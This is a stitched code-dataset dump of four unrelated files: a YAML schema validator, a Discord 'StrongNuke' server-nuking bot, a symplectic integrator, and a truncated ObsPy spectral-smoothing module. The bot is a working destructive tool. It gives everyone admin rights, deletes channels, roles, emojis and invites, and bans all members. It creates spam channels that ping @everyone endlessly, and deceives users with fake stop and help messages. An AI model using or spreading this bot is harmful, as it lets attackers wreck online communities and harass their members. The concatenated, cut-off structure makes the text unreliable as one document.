# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ruyaml
class FormatError(Exception):
def __init__(self, path, message, data=None, rule=None, parent=None, caused_by=None):
self.path = path
self.message = message
self.data = data
self.rule = rule
self.errors = caused_by
self.parent = parent
self.line = None
if isinstance(data, ruyaml.comments.CommentedBase):
self.line = data.lc.line
elif parent and isinstance(parent, ruyaml.comments.CommentedBase):
self.line = parent.lc.line
super().__init__(message)
class SchemaError(Exception):
pass
class DataError(Exception):
pass
def check_type(data, data_type, path, rule=None, parent=None):
if not isinstance(data, data_type):
msg = f'Object should be a {str(data_type)}'
if path:
last = path[-1]
msg = f'{last[0]} "{last[1]}" should be a {str(data_type)}'
raise FormatError(path, msg, data, rule, parent)
def check_match_type(match, data, data_type, path, rule, parent=None):
if not isinstance(data, data_type):
msg = f'Input data for {match}, rule "{rule}" should be {str(data_type)}"'
raise FormatError(path, msg, data, rule, parent)
def match_none(data, rules, rule, path, parent=None):
if data is not None:
msg = 'Object should be empty'
if path:
last = path[-1]
msg = f'{last[0]} "{last[1]}" should be empty'
raise FormatError(path, msg, data, rule, parent)
def match_any(data, rules, rule, path, parent=None):
pass
def match_list(data, rules, rule, path, parent=None):
check_match_type('match_list', data, list, path, rule, parent)
for i, v in enumerate(data):
process_rule(v, rules, rules[rule]['item'], path + [('Value of list index', i)], parent)
return True
def match_dict(data, rules, rule, path, parent=None):
check_match_type('match_dict', data, dict, path, rule, parent)
if 'required_items' in rules[rule]:
for i in rules[rule]['required_items']:
if i not in data:
raise FormatError(path, f'There is no required key "{i}" in map.', data, rule)
for k in data:
new_path = path + [('Value of map key', k)]
if 'items' in rules[rule] and k in rules[rule]['items']:
process_rule(data[k], rules, rules[rule]['items'][k], new_path, data)
elif 'default_item' in rules[rule]:
process_rule(data[k], rules, rules[rule]['default_item'], new_path, data)
else:
msg = f'Map key "{k}" is not allowed here (rule "{rule}")'
raise FormatError(path, msg, data, rule)
def match_dict_key_selection(data, rules, rule, path, parent=None):
check_match_type('dict_key_selection', data, dict, path, rule, parent)
key = rules[rule]['selector']
if key not in data:
msg = f'There is no key "{key}" in map.'
raise FormatError(path, msg, data, rule, parent)
value = data[key]
if value in rules[rule]['variants']:
process_rule(data, rules, rules[rule]['variants'][value], path, parent)
elif 'default_variant' in rule:
process_rule(data, rules, rules[rule]['default_variant'], path, parent)
else:
msg = f'Value "{value}" is not allowed for map key "{key}".'
raise FormatError(path, msg, data, rule, parent)
def match_one_of(data, rules, rule, path, parent=None):
errors = []
sub_errors = []
for obj in rules[rule]['variants']:
try:
process_rule(data, rules, obj, path, parent)
except FormatError as e:
if e.errors:
sub_errors += e.errors
errors.append(e)
if len(errors) == len(rules[rule]['variants']):
errors += sub_errors
msg = f'None of the variants for rule "{rule}" match'
raise FormatError(path, msg, data, rule, parent, caused_by=errors)
def match_set(data, rules, rule, path, parent=None):
if data not in rules[rule]['variants']:
msg = f'Value "{data}" not in set {rules[rule]["variants"]}'
raise FormatError(path, msg, data, rule, parent=parent)
def match_simple_type(obj_type):
def match(data, rules, rule, path, parent=None):
check_type(data, obj_type, path, rule, parent=parent)
return match
MATCH = {
'list': match_list,
'dict': match_dict,
'one_of': match_one_of,
'dict_key_selection': match_dict_key_selection,
'set': match_set,
'string': match_simple_type(str),
'bool': match_simple_type(bool),
'int': match_simple_type(int),
'float': match_simple_type(float),
'none': match_none,
'any': match_any,
}
def check_rule(rules):
if not isinstance(rules, dict):
return (False, 'YSpec should be a map')
if 'root' not in rules:
return (False, 'YSpec should has "root" key')
if 'match' not in rules['root']:
return (False, 'YSpec should has "match" subkey of "root" key')
return (True, '')
def process_rule(data, rules, name, path=None, parent=None):
if path is None:
path = []
if name not in rules:
raise SchemaError(f"There is no rule {name} in schema.")
rule = rules[name]
if 'match' not in rule:
raise SchemaError(f"There is no mandatory match attr in rule {rule} in schema.")
match = rule['match']
if match not in MATCH:
raise SchemaError(f"Unknown match {match} from schema. Impossible to handle that.")
# print(f'process_rule: {MATCH[match].__name__} "{name}" data: {data}')
MATCH[match](data, rules, name, path=path, parent=parent)
def check(data, rules):
if not isinstance(data, ruyaml.comments.CommentedBase):
raise DataError("You should use ruyaml.round_trip_load() to parse data yaml")
if not isinstance(rules, ruyaml.comments.CommentedBase):
raise SchemaError("You should use ruyaml.round_trip_load() to parse schema yaml")
process_rule(data, rules, 'root')
| 35.631579 | 96 | 0.645347 | 961 | 6,770 | 4.445369 | 0.17898 | 0.050562 | 0.042135 | 0.043071 | 0.305712 | 0.245084 | 0.194522 | 0.147004 | 0.131554 | 0.081929 | 0 | 0.001929 | 0.234121 | 6,770 | 189 | 97 | 35.820106 | 0.821987 | 0.121418 | 0 | 0.119403 | 0 | 0 | 0.193189 | 0.012306 | 0 | 0 | 0 | 0 | 0 | 1 | 0.11194 | false | 0.022388 | 0.007463 | 0 | 0.186567 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e67367986a944e9128e9626aafdf7669e04ea3c | 13,469 | py | Python | StrongNuke_Official.py | SpinachIsDelicious/StrongNuke-Discord-Server-Nuker | cdc8ff0fee6db6c3b13d99edf24dd914cb052786 | [
"MIT"
] | null | null | null | StrongNuke_Official.py | SpinachIsDelicious/StrongNuke-Discord-Server-Nuker | cdc8ff0fee6db6c3b13d99edf24dd914cb052786 | [
"MIT"
] | null | null | null | StrongNuke_Official.py | SpinachIsDelicious/StrongNuke-Discord-Server-Nuker | cdc8ff0fee6db6c3b13d99edf24dd914cb052786 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
import random
import subprocess
import asyncio
from discord import Permissions
import os
import threading # run code concurrently
from pyperclip import copy
# we want to use multiprocessing instead of threading since processes are more efficient
import multiprocessing
import pprint
import requests
import json
from colorama import init, Fore as cc
from colorama import Fore
from sys import exit
init()
dr = DR = r = R = cc.LIGHTRED_EX
g = G = cc.LIGHTGREEN_EX
b = B = cc.LIGHTBLUE_EX
m = M = cc.LIGHTMAGENTA_EX
c = C = cc.LIGHTCYAN_EX
y = Y = cc.LIGHTYELLOW_EX
w = W = cc.RESET
print("Loading modules...")
os.system("cls")
def displayStrongNuke():
print(Fore.RED + "Please note that your computer may overheat or use a lot of CPU using StrongNuke, this is mainly because of the speed and requests being sent to actually nuke servers. Enjoy nuking servers!" + Fore.RESET)
print(Fore.BLUE + "Made by Spinach#3369" + Fore.RESET)
print(Fore.CYAN + """
░██████╗████████╗██████╗░░█████╗░███╗░░██╗░██████╗░███╗░░██╗██╗░░░██╗██╗░░██╗███████╗
██╔════╝╚══██╔══╝██╔══██╗██╔══██╗████╗░██║██╔════╝░████╗░██║██║░░░██║██║░██╔╝██╔════╝
╚█████╗░░░░██║░░░██████╔╝██║░░██║██╔██╗██║██║░░██╗░██╔██╗██║██║░░░██║█████═╝░█████╗░░
░╚═══██╗░░░██║░░░██╔══██╗██║░░██║██║╚████║██║░░╚██╗██║╚████║██║░░░██║██╔═██╗░██╔══╝░░
██████╔╝░░░██║░░░██║░░██║╚█████╔╝██║░╚███║╚██████╔╝██║░╚███║╚██████╔╝██║░╚██╗███████╗
╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░╚═╝░░╚══╝░╚═════╝░╚═╝░░╚══╝░╚═════╝░╚═╝░░╚═╝╚══════╝""")
# I'm going to fix it deleting already nuked roles :D (after the channel problem)
displayStrongNuke()
# using webhooks to display messages feature is highly experimental and so you'll have to go into the code to enable it
# (it gets less pings since it ratelimits IPs faster so if you want 30 pings only, go ahead)
token = input(f"{g}Input bot token: {c}")
prefix = input(f"{m}Input bot prefix: {b}")
webhook_name = ""
tag = ""
user_id = 0
tagBanned = False
identityProtection = True
role_spamn = ["Annihilated!", "Obliterated!",
"Nuked!", "Decimated!"]
role_amount = 100
channels_created = 100
authorized = [user_id, "0", "0"]
SPAM_CHANNEL = ["Nuked!", "Annihilated!",
"Eradicated!", "Decimated!", "Incinerated!"]
SPAM_MESSAGE = ["Dang, you got nuked!",
"Absolutely anihilated!", "Dang man! Nice server!", "You got absolutely decimated!", "It's a beautiful server now mate.", "Beautiful server.", "Imagine messing with the wrong people xD", "How about NUKE", "These are some words I have: Decimated, Annihilated, Eradication, Incinerated, and you just got rekt."] # Spam ping names
client = commands.Bot(command_prefix=prefix)
client.remove_command("help")
print(Fore.RED + f"To nuke: type {prefix}nuke" + Fore.RESET)
presence = "with you!"
print(Fore.RED +
f"Nuking ready: Type {prefix}nuke to start the nuking process." + Fore.RESET)
copy(f"{prefix}nuke")
print(Fore.BLUE + "Copied nuke command to clipboard!" + Fore.RESET)
print(Fore.BLUE + "(!) Please note that if the Discord Server has Community enabled, it won't delete some channels." + Fore.RESET)
@client.event
async def on_ready():
await client.change_presence(activity=discord.Game(name=presence))
@client.command()
async def stop(ctx):
if ctx.author.id == user_id:
await ctx.author.send("Currently stopping the bot!")
await client.close()
print(Fore.GREEN +
f"{client.user.name} has logged out successfully." + Fore.RESET)
else:
await ctx.author.send("Currently stopping the bot!")
print(Fore.RED + "Fake stop message sent to user" + Fore.RESET)
@stop.error
async def stop_error(ctx, error):
if isinstance(error, commands.NotOwner):
await ctx.send("You can't use this command!")
@client.command()
async def rolespam(ctx):
for i in range(role_amount+1):
print(
Fore.RED + f"Started spamming roles!")
await ctx.guild.create_role(name=random.choice(role_spamn))
# roleSpamThread = Thread(target=rolespam)
@rolespam.error
async def rolespam_error(ctx, error):
await ctx.author.send(f"An error occured- {str(error)}")
print(Fore.RED + "Note that sometimes, our PreventDeletion of already nuked channels fails. This is completely normal. At least the server is already nuked!")
@client.command()
async def say(ctx, *, msgsay):
async def do():
await ctx.message.delete()
await ctx.send(msgsay)
t = threading.Thread(target=do).start()
@say.error
async def say_error(ctx, error):
await ctx.author.send(f"An error occured- {str(error)}")
@client.command(aliases=["annihilate","decimate","eradicate","obliterate","destroy"])
async def nuke(ctx):
await ctx.message.delete()
guild = ctx.guild
try:
role = discord.utils.get(guild.roles, name="@everyone")
await role.edit(permissions=Permissions.all())
print(Fore.MAGENTA + "I have given everyone admin." + Fore.RESET)
except:
print(Fore.GREEN + "I was unable to give everyone admin" + Fore.RESET)
try:
for role in ctx.guild.roles:
role = discord.utils.get(guild.roles, name=role)
# why not give everyone admin
await role.edit(permissions=Permissions.all())
except:
pass
for channel in guild.channels:
try:
channelVar = str(channel.name)
if channelVar in SPAM_CHANNEL or channelVar.lower().strip() in SPAM_CHANNEL:
print(Fore.GREEN + "Prevented deletion of already nuked channels!")
#I try in many ways to make the antichanneldeletion work
else:
await channel.delete()
print(Fore.MAGENTA +
f"{channel.name} was deleted." + Fore.RESET)
except Exception as err:
print(Fore.GREEN + f"{channel.name} was NOT deleted." + Fore.RESET)
print(Fore.RED + f"Channel delete error -{str(err)}" + Fore.RESET)
for member in guild.members:
try:
if member in authorized:
print(
Fore.RED + f"{member.name}#{member.discriminator} Was unable to be banned: ADMIN DETECTED" + Fore.RESET)
else:
await member.ban()
print(
Fore.MAGENTA + f"{member.name}#{member.discriminator} Was banned" + Fore.RESET)
except:
print(
Fore.GREEN + f"{member.name}#{member.discriminator} Was unable to be banned." + Fore.RESET)
for role in guild.roles:
try:
await role.delete()
print(Fore.MAGENTA + f"{role.name} Has been deleted" + Fore.RESET)
except:
print(Fore.GREEN +
f"{role.name} Has not been deleted" + Fore.RESET)
# try:
# roleSpamThread = Thread(target=rolespam)
# roleSpamThread.start()
# except:
# print(Fore.RED + "Role spamming has not been enabled." + Fore.RESET)
for emoji in list(ctx.guild.emojis):
try:
await emoji.delete()
print(Fore.MAGENTA + f"{emoji.name} Was deleted" + Fore.RESET)
except:
print(Fore.GREEN + f"{emoji.name} Wasn't Deleted" + Fore.RESET)
banned_users = await guild.bans()
for ban_entry in banned_users:
user = ban_entry.user
try:
await user.unban(user)
print(
Fore.MAGENTA + f"{user.name}#{user.discriminator} Was successfully unbanned." + Fore.RESET)
except:
print(
Fore.GREEN + f"{user.name}#{user.discriminator} Was not unbanned." + Fore.RESET)
for invite in await guild.invites():
if invite.inviter in authorized:
print(Fore.CYAN + "Prevented deletion of Authorized Invite" + Fore.RESET)
else:
print(
Fore.RED + f"Deleted an invite to {guild.name}." + Fore.RESET)
await invite.delete() # no proof!!
async def create():
for i in range(channels_created):
await guild.create_text_channel(str(random.choice(SPAM_CHANNEL)))
print(Fore.GREEN + "Created text channel!" + Fore.RESET)
await guild.create_voice_channel(str(random.choice(SPAM_CHANNEL)))
print(Fore.CYAN + "Created voice channel!" + Fore.RESET)
await create()
for channel in guild.text_channels:
link = await channel.create_invite(max_age=0, max_uses=0)
print(f"New Invite: {link}")
print(f"Obliterated {guild.name} Successfully.")
return
@nuke.error
async def nuke_error(ctx, error):
if isinstance(error, discord.errors.HTTPException):
print(
Fore.RED + "The bot is ratelimited! This shows that the server has reached over 1,000 pings! [CODE: 1]" + Fore.RESET)
@client.command()
async def pingall(ctx):
await ctx.message.delete()
await ctx.channel.send("@everyone", delete_after=0)
@pingall.error
async def pingall_error(ctx, error):
await ctx.author.send(f"Surprisingly. There has been an error with the **PINGALL** command! __{str(error)}__")
@client.command(aliases=['membercount', 'mcount', "scount", 'members', "servercount"])
async def memcount(ctx):
await ctx.channel.send("There are " + str(ctx.message.guild.member_count) + " members in the server!")
@memcount.error
async def memcount_error(ctx, error):
await ctx.author.send(f"Surprisingly. You're messing with the bot! Here's the error you gave. __{str(error)}__")
@client.event
async def on_guild_channel_create(channel):
try:
async def startSpam():
while True:
# create = await channel.create_webhook(name=webhook_name)
if identityProtection == True:
await channel.send("@everyone | " + random.choice(SPAM_MESSAGE))
print(Fore.YELLOW + "Sent @everyone message!" + Fore.RESET)
# await create.send("@everyone | " + random.choice(SPAM_MESSAGE))
# print(Fore.YELLOW + "Sent @everyone message!" + Fore.RESET)
else:
await channel.send("@everyone | " + random.choice(SPAM_MESSAGE) + f" -{tag}")
print(Fore.YELLOW + "Sent @everyone message!" + Fore.RESET)
# await create.send("@everyone | " + random.choice(SPAM_MESSAGE) + f" -{tag}")
# print(Fore.YELLOW + "Sent @everyone message!" + Fore.RESET)
if channel.type in (discord.ChannelType.voice, discord.ChannelType.text):
if channel.type == discord.ChannelType.voice:
pass
else:
await startSpam()
except Exception as err:
if isinstance(err, discord.errors.HTTPException):
print(
Fore.RED + "The bot has been ratelimited! [CODE: 2]" + Fore.RESET)
@client.command()
async def vcspam(ctx):
guild = ctx.guild
print(Fore.CYAN + "Started spamming VCs!" + Fore.RESET)
for i in range(channels_created):
await guild.create_voice_channel(str(random.choice(SPAM_CHANNEL)))
@vcspam.error
async def vcspam_error(ctx, error):
await ctx.author.send(f"Stop messing with the bot bro! __{str(error)}__")
@client.command()
async def help(ctx):
try:
if ctx.author.id in authorized: # make sure to input real alt accounts and tags or else no help command
await ctx.author.send(f"""
{prefix}help - shows this message
{prefix}nuke - nukes the server
{prefix}pingall - pings everyone
{prefix}stop - logs the bot out
{prefix}rolespam - spams roles
{prefix}memcount - shows the amount of members in the server
{prefix}vcspam - spams half channels (highly unrecommended as {prefix}nuke does it as well)""")
else:
# fake help message
await ctx.author.send("Hello there! The **HELP** message is currnetly being developed! Remember: It'll be here soon!")
except:
await ctx.send("Your DMs aren't enabled! Enable them to get the message.")
@help.error
async def help_error(ctx, error):
await ctx.author.send(f"A super rare **HELP** error has occured! __{str(error)}__")
@client.command(pass_context=True, aliases=['dmsend', 'dm'])
async def senddm(ctx, userID, *, text):
user = await client.get_user(userID)
await user.send(text)
# @senddm.error
# async def senddm_error(ctx,error):
# if isinstance(error, )
# Still being developed!
client.run(token, bot=True)
displayStrongNuke()
input(Fore.RED + "The code has successfully ran. After this, the process will terminate itself. Press enter to close. >>> ")
os.system(f"taskkill /f /im {__file__}")
quit()
# Developer's message (idk)
"""
First of all. I created this tool for educational
purposes only. I am not responsible for any actions
you take using this tool.
Second of all.
I don't know what the developer's message is but
you should still understand, that I AM NOT RESPONSIBLE.
Third of all.
Spinach#3369
"""
| 33.588529 | 345 | 0.604796 | 1,674 | 13,469 | 5.120072 | 0.244325 | 0.039902 | 0.016801 | 0.021001 | 0.241045 | 0.205227 | 0.154008 | 0.139424 | 0.094738 | 0.076537 | 0 | 0.002879 | 0.25206 | 13,469 | 400 | 346 | 33.6725 | 0.7973 | 0.091469 | 0 | 0.254902 | 0 | 0.035294 | 0.331164 | 0.059186 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003922 | false | 0.011765 | 0.062745 | 0 | 0.070588 | 0.152941 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e68681a8b4c1d22d57880c0f3f4450cada8817d | 7,323 | py | Python | vorpy/symplectic_integration/separable_hamiltonian.py | vdods/vorpy | 68b6525ae43d99f451cf85ce254ffb0311521320 | [
"MIT"
] | 3 | 2017-07-08T14:41:46.000Z | 2020-02-11T17:33:57.000Z | vorpy/symplectic_integration/separable_hamiltonian.py | vdods/vorpy | 68b6525ae43d99f451cf85ce254ffb0311521320 | [
"MIT"
] | null | null | null | vorpy/symplectic_integration/separable_hamiltonian.py | vdods/vorpy | 68b6525ae43d99f451cf85ce254ffb0311521320 | [
"MIT"
] | null | null | null | """
Implements a family of separable Hamiltonian symplectic integrators, where the family is parameterized by the
coefficients which define the weights for each update step. A separable Hamiltonian has the form
H(q,p) = K(p) + V(q)
where K and V are prototypically the kinetic and potential energy functions, respectively. In this case,
Hamilton's equations are
dq/dt = \partial K / \partial p
dp/dt = - \partial V / \partial q
and a leapfrog technique is used to implement the integration using the provided update step coefficients.
For convenience, this module provides several predefined values in the module-level update_step_coefficients
variable which may be used to specify the update_step_coefficients parameter of the integrate function. This
parameter defines the order of the integrator as well as other particular properties.
References
https://en.wikipedia.org/wiki/Symplectic_integrator
https://en.wikipedia.org/wiki/Energy_drift
"""
import collections
import numpy as np
from .. import apply_along_axes
from . import exceptions
def __make_ruth4_update_step_coefficients():
    """
    Build the (2,4) update-step coefficient array for Ruth's 4th-order
    symplectic integrator.

    Row 0 holds the position-update weights c_i and row 1 the
    momentum-update weights d_i; each row sums to one.  See
    https://en.wikipedia.org/wiki/Symplectic_integrator
    """
    cbrt_of_two = 2.0**(1.0/3.0)
    denominator = 2.0 - cbrt_of_two
    # The c weights are symmetric: outer pair c_0 = c_3, inner pair c_1 = c_2.
    outer_c = 0.5/denominator
    inner_c = 0.5*(1.0 - cbrt_of_two)/denominator
    # The d weights: d_0 = d_2, a negative middle weight d_1, and d_3 = 0.
    outer_d = 1.0/denominator
    middle_d = -cbrt_of_two/denominator
    return np.array([
        [outer_c, inner_c, inner_c, outer_c],
        [outer_d, middle_d, outer_d, 0.0]
    ])
# Named container for the predefined per-order coefficient tables below.
UpdateStepCoefficients = collections.namedtuple('UpdateStepCoefficients', ['euler1', 'verlet2', 'ruth3', 'ruth4'])

# Predefined update-step coefficient tables, one per integrator order (see the
# module docstring and the `integrate` docstring).  Each entry is a (2,K)
# numpy array: row 0 holds the position-update weights (c_i) and row 1 the
# momentum-update weights (d_i); each row sums to 1.
update_step_coefficients = UpdateStepCoefficients(
    # euler1 -- 1st order
    np.array([
        [1.0],
        [1.0]
    ]),
    # verlet2 -- 2nd order
    np.array([
        [0.0, 1.0],
        [0.5, 0.5]
    ]),
    # ruth3 -- 3rd order
    np.array([
        [1.0, -2.0/3.0, 2.0/3.0],
        [-1.0/24.0, 0.75, 7.0/24.0]
    ]),
    # ruth4 -- 4th order
    __make_ruth4_update_step_coefficients()
)
def integrate (*, initial_coordinates, t_v, dK_dp, dV_dq, update_step_coefficients):
    """
    This function computes multiple timesteps of the separable Hamiltonian symplectic integrator defined by the
    update_step_coefficients parameter.

    Let N denote the dimension of the configuration space (i.e. the number of components of the q coordinate).
    A single set of coordinates shall be represented with a numpy array of shape (2,N).

    Parameters:
    - initial_coordinates specify the coordinates from which to begin integrating.  This should have
      the shape (A_1,A_2,...,A_M,2,N), where M might be zero (in which case the shape is (2,N)).
      The indices A_1,A_2,...,A_M (of which there can be none) may index some other parameter to
      the initial conditions, such that many integral curves will be computed in parallel (one for
      each assignment of A_1,A_2,...,A_M index).
    - t_v specifies a list of the time values at which to integrate the system.  The first value corresponds
      to the initial condition, so the length of t_v must be at least 1.  The timesteps are computed as the
      difference between successive elements.  The timesteps can be negative; see
      https://en.wikipedia.org/wiki/Symplectic_integrator#A_second-order_example
    - dK_dp and dV_dq should be functions of the respective forms
        lambda p : <expression evaluating \partial K / \partial p>
        lambda q : <expression evaluating \partial V / \partial q>
      and should each accept and return a vector having N components.
    - update_step_coefficients should be a numpy.ndarray with shape (2,K), where K is the order of the integrator.
      These coefficients define the specific integrator by defining the weight of each leapfrog update
      step.  Row 0 and row 1 correspond to the update step weight for even and odd leapfrog update steps
      respectively.  Predefined coefficients are available via the update_step_coefficients variable found in
      this module.  In particular,
        update_step_coefficients.euler1  : 1st order
        update_step_coefficients.verlet2 : 2nd order
        update_step_coefficients.ruth3   : 3rd order
        update_step_coefficients.ruth4   : 4th order
      The rows of update_step_coefficients must sum to one, i.e.
        all(numpy.sum(update_step_coefficients[i]) == 1.0 for i in [0,1])
      and are described at https://en.wikipedia.org/wiki/Symplectic_integrator

    Return values:
    - integrated_coordinates is a numpy.ndarray having shape (len(t_v),A_1,A_2,...,A_M,2,N), containing the coordinates of
      each integrator step starting with initial_coordinates.
    """
    initial_coordinates_shape = np.shape(initial_coordinates)
    update_step_coefficients_shape = np.shape(update_step_coefficients)

    # Validate the inputs before doing any work.
    assert len(initial_coordinates_shape) >= 2
    assert initial_coordinates_shape[-2] == 2
    assert len(t_v) >= 1
    assert update_step_coefficients_shape[0] == 2, 'update_step_coefficients must have shape (2,K), where K is the order of the integrator.'
    assert np.allclose(np.sum(update_step_coefficients, axis=1), 1.0), 'rows of update_step_coefficients must sum to 1.0 (within numerical tolerance)'

    # N is the dimension of the underlying configuration space.  Thus 2*N is the dimension of the phase space,
    # hence a coordinate of the phase space having shape (2,N).
    N = initial_coordinates_shape[-1]
    # get the axes not corresponding to the final (2,N) part of the shape.  This can be the empty tuple.
    non_coordinate_shape = initial_coordinates_shape[:-2]
    # NOTE(review): non_coordinate_axis_v appears to be unused in this function.
    non_coordinate_axis_v = tuple(range(len(non_coordinate_shape)))
    # T is the number of timesteps
    T = len(t_v)

    # Create the return value
    integrated_coordinates = np.ndarray((T,)+non_coordinate_shape+(2,N), dtype=initial_coordinates.dtype)
    # Create a buffer for intermediate coordinates
    current_coordinates = np.copy(initial_coordinates)
    # Create slices to address the q and p components of current_coordinates.
    # NOTE: q and p are views into current_coordinates, so the in-place updates
    # below (+= and -=) mutate current_coordinates directly.
    q = current_coordinates[...,0,:]
    p = current_coordinates[...,1,:]

    # Store the initial coordinates (which current_coordinates is currently equal to).
    integrated_coordinates[0,...] = current_coordinates

    for step_index,timestep in enumerate(np.diff(t_v)):
        try:
            # Iterate over (c,d) pairs and perform the leapfrog update steps.
            # The q update must precede the p update within each pair, since the
            # p update is evaluated at the freshly updated q.
            for c,d in zip(update_step_coefficients[0],update_step_coefficients[1]):
                # The (2,N) phase space is indexed by the last two indices, i.e. (-2,-1) in that order.
                q += timestep*c*apply_along_axes(dK_dp, (-1,), (p,), output_axis_v=(-1,), func_output_shape=(N,))
                p -= timestep*d*apply_along_axes(dV_dq, (-1,), (q,), output_axis_v=(-1,), func_output_shape=(N,))
            # Store the results.
            integrated_coordinates[step_index+1,...] = current_coordinates
        except Exception as e:
            # If a non-system-exiting or user-defined exception was encountered, then salvage the part
            # of the curve that was computed without error.
            raise exceptions.SalvagedResultException(
                original_exception=e,
                salvaged_t_v=np.copy(t_v[:step_index+1]),
                salvaged_qp_v=np.copy(integrated_coordinates[:step_index+1,...])
            ) from e

    return integrated_coordinates
| 44.381818 | 150 | 0.69548 | 1,088 | 7,323 | 4.525735 | 0.26011 | 0.054833 | 0.10723 | 0.015435 | 0.139724 | 0.081844 | 0.071284 | 0.045085 | 0.015435 | 0.015435 | 0 | 0.025223 | 0.220401 | 7,323 | 164 | 151 | 44.652439 | 0.837274 | 0.590195 | 0 | 0.096774 | 0 | 0 | 0.073747 | 0.0247 | 0 | 0 | 0 | 0 | 0.080645 | 1 | 0.032258 | false | 0 | 0.064516 | 0 | 0.129032 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6bf6742a02077e6b21992401210c8cc43b72cf | 11,270 | py | Python | IRIS_data_download/IRIS_download_support/obspy/signal/konnoohmachismoothing.py | earthinversion/Fnet_IRIS_data_automated_download | 09a6e0c992662feac95744935e038d1c68539fa1 | [
"MIT"
] | 2 | 2020-03-05T01:03:01.000Z | 2020-12-17T05:04:07.000Z | IRIS_data_download/IRIS_download_support/obspy/signal/konnoohmachismoothing.py | earthinversion/Fnet_IRIS_data_automated_download | 09a6e0c992662feac95744935e038d1c68539fa1 | [
"MIT"
] | 4 | 2021-03-31T19:25:55.000Z | 2021-12-13T20:32:46.000Z | IRIS_data_download/IRIS_download_support/obspy/signal/konnoohmachismoothing.py | earthinversion/Fnet_IRIS_data_automated_download | 09a6e0c992662feac95744935e038d1c68539fa1 | [
"MIT"
] | 2 | 2020-09-08T19:33:40.000Z | 2021-04-05T09:47:50.000Z | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------
# Filename: konnoohmachismoothing.py
# Purpose: Small module to smooth spectra with the so called Konno & Ohmachi
# method.
# Author: Lion Krischer
# Email: krischer@geophysik.uni-muenchen.de
# License: GPLv2
#
# Copyright (C) 2011 Lion Krischer
# --------------------------------------------------------------------
"""
Functions to smooth spectra with the so called Konno & Ohmachi method.
:copyright:
The ObsPy Development Team (devs@obspy.org)
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA
import warnings
import numpy as np
def konno_ohmachi_smoothing_window(frequencies, center_frequency,
                                   bandwidth=40.0, normalize=False):
    """
    Compute the Konno & Ohmachi smoothing window centered on
    ``center_frequency``, evaluated at every entry of ``frequencies``.

    The window value at frequency ``f`` is (see [Konno1998]_)::

        [sin(b * log_10(f/f_c)) / (b * log_10(f/f_c))]^4

    with ``b`` the bandwidth and ``f_c`` the center frequency.  The window's
    width is constant on a logarithmic scale: a small bandwidth smooths
    strongly, a large one weakly.  The customary value (and default) is 40,
    following the `Geopsy documentation <http://www.geopsy.org>`_.

    All parameters are expected to be positive; for performance reasons this
    is not validated, and negative values may yield unexpected results.

    :type frequencies: :class:`numpy.ndarray` (float32 or float64)
    :param frequencies:
        Frequencies at which the smoothing window is evaluated.
    :type center_frequency: float
    :param center_frequency:
        Center of the smoothing window.  Must be greater or equal to 0.
    :type bandwidth: float
    :param bandwidth:
        Width of the smoothing peak; must be greater than 0.  Lower values
        give a broader peak.  Defaults to 40.
    :type normalize: bool, optional
    :param normalize:
        The window is normalized on a logarithmic scale by construction.
        Set to True to additionally normalize it to unit sum on a normal
        (linear) scale.  Defaults to False.
    """
    if frequencies.dtype not in (np.float32, np.float64):
        raise ValueError('frequencies needs to have a dtype of float32/64.')
    # A zero center frequency makes log10(f/f_c) undefined everywhere; the
    # limiting window is an indicator on the zero frequency.
    if center_frequency == 0:
        window = np.zeros(len(frequencies), dtype=frequencies.dtype)
        window[frequencies == 0.0] = 1.0
        return window
    # Evaluate the formula with divide-by-zero / invalid warnings silenced;
    # the two singular points are patched up afterwards.
    with np.errstate(divide='ignore', invalid='ignore'):
        scaled_log = bandwidth * np.log10(frequencies / center_frequency)
        window = (np.sin(scaled_log) / scaled_log) ** 4
    # At f == f_c the expression is 0/0, but the limit f -> f_c is one.
    window[frequencies == center_frequency] = 1.0
    # At f == 0 the logarithm is -inf, but the limit f -> 0 (f_c != 0) is zero.
    window[frequencies == 0.0] = 0.0
    if normalize:
        window /= window.sum()
    return window
def calculate_smoothing_matrix(frequencies, bandwidth=40.0, normalize=False):
    """
    Build a square smoothing matrix with one Konno & Ohmachi window per row.

    Row ``i`` of the returned ``len(frequencies) x len(frequencies)`` matrix
    is the smoothing window centered on ``frequencies[i]``.  Any spectrum
    sampled at exactly these frequency bins can then be smoothed with
    :func:`~obspy.signal.konnoohmachismoothing.apply_smoothing_matrix`; this
    also works for many spectra stacked in one matrix and is very efficient
    when the same binning is smoothed repeatedly — at the cost of O(n^2)
    memory for large frequency arrays.

    :type frequencies: :class:`numpy.ndarray` (float32 or float64)
    :param frequencies:
        The input frequencies.
    :type bandwidth: float
    :param bandwidth:
        Width of the smoothing peak; must be greater than 0.  Lower values
        give a broader peak.  Defaults to 40.
